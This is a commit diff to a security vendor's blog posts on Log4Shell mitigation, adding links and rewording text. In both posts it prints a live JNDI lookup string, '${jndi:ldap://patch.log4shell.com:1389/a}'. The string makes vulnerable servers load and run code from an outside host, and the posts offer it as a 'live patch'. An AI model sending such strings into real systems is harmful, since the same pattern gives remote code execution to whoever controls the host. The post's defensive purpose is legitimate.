Add links back to other posts

lunasec-io · Dec 16, 2021 · 7a305f7 · 7a305f7
1 parent 33bbf9c
commit 7a305f7
Show file tree

Hide file tree

Showing 2 changed files with 15 additions and 5 deletions.
diff --git a/docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx b/docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx
@@ -306,12 +306,19 @@ Because of the extensive control Log4Shell gives an attacker, it's actually poss
 This isn't the recommended strategy for various reasons, but it could be a last resort for systems that you can't easily restart or modify.  Note that doing this on a system 
 you don't have permission to is most likely illegal. The fix will only work until the server (or the JVM) is restarted.
 
-You use our hosted version here to patch yourself:
+We've published articles about this exploit that you can use to learn more about how it works.
+- **[Overview (When to use it)](https://www.lunasec.io/docs/blog/log4shell-live-patch/)**,
+- **[Technical Deep-dive](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical)**
+
+#### Hosted Exploit Payload
+
 ```
 ${jndi:ldap://patch.log4shell.com:1389/a}
 ```
 
-Just simply paste that anywhere into your server where you're vulnerable, and it will work. (For example, in the `main` function when you start up your server)
+Just simply paste that anywhere into your server where you're vulnerable, and it will patch you against future
+exploitation. (For example, in the `main` function when you start up your server, or a known vulnerable field if it's
+a vendor product you depend on.)
 
 We have added this functionality to the [latest release](https://github.com/lunasec-io/lunasec/releases) of our
 Log4Shell CLI tool if you'd prefer to run the server yourself instead.
@@ -325,8 +332,6 @@ If you need a permanent solution for Log4Shell, please check out our commercial
 [Live Patch service](https://www.lunasec.io/pages/live-dependency-patching) for a production-ready alternative.
 :::
 
-How it works and how to accomplish it manually is explained in [this guide](https://github.com/Cybereason/Logout4Shell). Our implementation is based on the work they did.
-
 ## How to protect yourself from future 0-days
 
 It's becoming increasingly apparent that Log4Shell is not going to be the last vulnerability of its kind. Any trusted dependency

diff --git a/docs/blog/2021-12-15-log4shell-live-patch.mdx b/docs/blog/2021-12-15-log4shell-live-patch.mdx
@@ -36,12 +36,17 @@ authors:
 -->
 
 **TL;DR:** This string will temporarily fix your systems by patching them against Log4Shell, but *please* read the rest
-of this post before you use it!
+of this post before you use it! **Update:** We
+[posted a follow-up post](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical) with a technical deep-dive
+into how this exploit works.
 
 ```
 ${jndi:ldap://patch.log4shell.com:1389/a}
 ```
 
+_If you're looking for resources on how to detect and patch yourself against Log4Shell, please also read our in-depth
+[Mitigation Guide](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide)._
+
 ## Why Log4Shell is an especially painful vulnerability
 
 Mitigating a vulnerability in a single dependency used by your project typically requires a lot of work: